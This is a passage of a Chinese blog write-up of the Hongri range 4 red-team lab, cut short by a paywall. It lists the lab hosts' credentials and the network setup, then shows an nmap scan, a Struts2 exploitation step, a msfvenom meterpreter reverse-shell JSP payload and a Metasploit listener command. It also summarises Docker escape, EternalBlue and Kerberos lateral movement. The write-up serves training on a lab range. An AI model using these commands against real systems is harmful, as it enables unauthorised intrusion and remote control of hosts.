靶场搭建
靶场下载地址:漏洞详情
共有三台主机DC、WEB、WIN7
机器密码
WEB主机 ubuntu:ubuntu
WIN7主机 douser:Dotest123
(DC)WIN2008主机 administrator:Test2008
网络配置
创建两个子网vmnet0和vmnet1
vmnet1:192.168.183.0

WEB主机网卡设置

WIN7主机网卡设置

DC主机网卡设置

攻击机kali的网卡和WEB主机的第一个出网网卡一致为NAT模式
WEB主机(Ubuntu)

DC主机(Windows 2008)

WIN7

WEB主机(Ubuntu)上启动环境
sudo docker start ec 17 09 bb da 3d ab ad

渗透测试
扫描端口开放情况
nmap -sS -p 1-65535 -A 192.168.48.146

端口22开放,存在SSH服务
2001,2002,2003端口开放,存在WEB
看到2001使用了Struts2中间件
2002使用了Apache Tomcat中间件
2003为Apache、PHPmyadmin、mysql
访问WEB
2001端口

2002端口

2003端口,发现不需要密码就可以进入phpmyadmin后台

利用Struts2漏洞获得shell
使用了Struts2
直接使用工具进行检测和利用



利用漏洞上传msf马
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp



msf启动监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
访问马

成功收到会话

利用phpmyadmin后台获得shell
还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:
本文介绍了在一个红队评估(红日靶场四)中的渗透测试过程,包括靶场搭建、扫描端口、利用Struts2、phpmyadmin和Tomcat漏洞获取shell、内网渗透如Docker逃逸、提权、添加路由建立代理等。此外,还详细讲解了如何利用永恒之蓝和Kerberos漏洞进行横向移动和域控提权。
最低0.47元/天 解锁文章
338

被折叠的 条评论
为什么被折叠?



